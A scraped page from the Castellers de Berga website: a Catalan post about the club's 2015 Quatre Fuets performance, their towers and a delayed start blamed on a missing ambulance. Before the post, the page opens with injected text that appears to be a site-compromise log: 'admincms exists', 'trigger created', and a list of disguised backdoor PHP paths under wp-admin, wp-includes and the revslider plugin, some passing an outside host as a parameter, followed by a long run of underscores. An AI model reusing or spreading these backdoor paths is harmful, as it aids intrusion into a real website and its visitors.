Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?meta https://castellersdeberga.cat/wp-admin/includes/class-wp-filesystem-ftpsockets-ajax-response-ajax-cron-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-site-health-auto-updates-stream-stream-ajax-response-meta-stream-ajax-response-wp-stream.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/plugin-ajax-response-stream-private-private.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-ajax-response-core-meta-meta.php https://castellersdeberga.cat/wp-content/plugins/revslider/uninstall-ajax-core-ajax-wp-private.php https://castellersdeberga.cat/wp-includes/class-walker-nav-menu-core-cron.php https://castellersdeberga.cat/wp-includes/class-wp-object-cache-meta-ajax-response-ajax-response-cron-cron.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Sobre la Diada dels Quatre Fuets 2015
 

Sobre la Diada dels Quatre Fuets 2015


Sobre la Diada dels Quatre Fuets 2015Els grans castells no són cosa de només uns quants sinó de molts, cadascú posant-hi la seva part. Les construccions descarregades a la Diada dels Quatre Fuets 2015 les vivim com un èxit col.lectiu i un orgull per a la ciutat i la comarca.
A la diada del 31 de maig, a la Plaça de Sant Pere, els Castellers de Berga vam igualar la millor actuació que haguem fet mai descarregant el 4 de 7 amb agulla, el 5 de 7 i el 7 de 7. Però no només això, sinó que divendres vam fer un assaig estimulant i un concert a la mateixa plaça, I diumenge, a més dels castells i de lluitar contra els elements, vam donar dinar a més de 600 persones.
Diumenge 31 de maig, al pic del migdia, la Plaça de Sant Pere estava plena de gent expectant. Lamentem profundament el retard en l’inici de l’actuació. L’Ajuntament de Berga no havia contractat l’ambulància. Ens sap greu pel nombrós públic, per les colles convidades i per les afectacions que aquest retard va provocar. Llegim aquest error en clau positiva i acceptem la part d’autocrítica que ens correspongui però que aquest fet serveixi en el futur a Berga i a qualsevol altre lloc on s’alcin castells.
Tot plegat ho podem fer millor. Podem anar més lluny i més amunt. I ho farem. I serà fent pinya amb les colles amb qui compartim emocions, els patrocinadors, les entitats amb qui teixim col.laboracions, el públic que vibra amb nosaltres. El nostre més sincer agraïment per ser-hi.